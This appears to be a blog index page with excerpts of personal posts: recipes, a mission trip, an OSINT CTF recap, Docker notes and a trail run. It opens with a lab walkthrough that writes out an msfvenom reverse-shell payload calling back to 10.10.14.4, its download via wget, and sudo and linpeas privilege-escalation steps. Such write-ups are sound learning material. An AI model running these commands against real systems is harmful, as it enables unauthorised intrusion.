Dev and Security Walkthroughs

I run dirbuster on a small wordlist. It finds /dev/phpbash.php. phpbash.php lets user www-data run bash commands on the machine. I try various reverse shells and none of them work. I resort to making an elf file using msfvenom. The command to make the shell is: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f elf > ex.elf I switch to the /tmp directory and download my elf shell using wget http://10.10.14.4/ex.elf . The system is so old that chmod +x doesn't work. You can use chmod 777 ex.elf instead. I run ./ex.elf and get a reverse shell back in the terminal. The first command I do is sudo -l . I notice I can run any command as user scriptmanager . You can either run sudo -u scriptmanager bash -i or connect to another shell. I download linpeas.sh and run the script. Linpeas is my next step toward privilege escalation. Linpeas points to an unsuual directory called /scripts. It also shows /scripts has been modified in the past 5 minutes. This ...

1. Overnight Oats Recipe - BANANA - Easy & Healthy Breakfast Ideas 2. Roasted Broccoli 3. Roasted Cauliflower 4. Pumpkin Smoothie 5. Vegan Cauliflower Buffalo Wings 6. Overnight Oats - 5 Recipes Blueberry/Banana-Choc/Strawberry 7. Amanda's Detox Green Drink 8. Banana Chia Pudding (Make half) 9. Banana Bread 10. Blueberry Banana Oat Bread 11. Roasted Acorn Squash Seeds 12. Vegan Zucchini Pasta Alfredo 13. Miso Soup 14. Delicata Squash 15. Butternut Squash 16. Black Bean Soup 17. Roasted White Asparagus with Herbs de Provence 18. Vegan Hollandaise Sauce 19. Healthy Vegan Banana Muffins 20. Vegan Fried Fish

Kentucky Appalachia Mission Trip I traveled to Appalachia because God told me to on December 31, 2020. I got a text message from a 5-digit number and the number is significant between me and God. I researched the charity and found out it was real. I got a text message from God telling me to go volunteer in Kentucky. I know 99% of people would ignore such an ad, and I ignore them too. The 5-digit number it came from along with my gut feeling, it took minutes to make a decision. I showed up, because God shows up for me. It's really special to get a message from God telling us to do something. I love it when it happens and (from memory), I always complied. I wish it happened more. I've been somewhat disconnected from God and haven't found a church since my Ohio days. Our connection isn't as strong as I'd like it to be. I'm glad God invited me to Appalachia and Crossroads. I met some amazing people who I enjoyed company with. I felt absolute joy when we were ...

Introduction I competed in the Trace Labs Defcon Edition CTF 2021. Our team won 2nd Place and recieved the Silver Badge. I was a judge for the past 6 CTFs and wanted to compete this time. Heather saw a team needed 1 more comrade and notified me of it. The team was competitive so it was a perfect fit because I'm super competitive too. For 30 minutes after the competition ended, we had to painfully see the scoreboard move up and down. It was a nail biter. We tried our best and thats what matters. CTF I stayed on one case most of the event. I kept submitting non-stop until the last hour. It was getting hard to find new info. I jumped around on the three other cases and submitted stuff for those. I discovered this helpful site too: judyrecords.com Next Steps I'm in a competitive mood so I will compete again next CTF. It would be a dream to get the Black Badge so we will see. Silver Badge - Global OSINT Search Party CTF Awarded: Aug 6, 2021 Awarded To: Aman...

1. Pull a Docker Container with/without tags. By default, Docker will pull the :latest image. Pull The busybox image from here: hub.docker.com docker pull busybox // same thing as latest docker pull busybox:latest docker pull busybox:1.24 2. Run a docker container docker run -i -t busybox:1.24 // pops an interactive shell docker run -it busybox:1.24 // same thing, switch -it combined docker run -name hello_world busybox:latest echo hello // runs it for a second 3. List Running Containers docker ps -OR- docker container list 4. Running a Container with Port docker run -it -p 8080:8080 tomcat:8.0 - OR - docker run -d -it -p 8080:8080 tomcat:8.0 //detached mode // runs in background docker logs 33929010101010101 // get logs for -d 5. Save changes to Container docker ps -a (copy short Container ID) docker commit 4b6df73fb04a amanda/debian:1.00 sha256:5e38921b9a8ff1980a31d711a008db522f9f24feeda167b6a75501ccb9d925bd docker images 6. DockerFiles A Dock...

Favorite Photo - Miami University Trail by Dewitt Cabin I traveled to Cincinatti on May 30-31 2021. My right foot has been hurting since 5 days ago. It hurts to walk, but not when running. Its poetic INjustice since the last time I was at Miami, I left with a car hitting me and on crutches in 2016. I was a student at Miami for 1 semester and thats all I could take of it lol. I remember Miami having extremely nice trails. When you breathe the air, its different . Its SO clean! I parked at DeWitt because its free and I don't want another $70 parking ticket from Miami. All the paths I ran on were undiscovered by past me. The one trail I wanted to go on, I couldn't find in time. After 5 miles, I couldn't walk/run no more. Shawnee Overlook was my main attraction. I completed all the trails. Below is a ranking: Little Turtle Trail (Best Run) 2.0 Miles Miami Fort Trail (Best View) 1.4 Miles Blue Jacket Trail (Open Fields) 1.25 Miles Miami doesn't have a trai...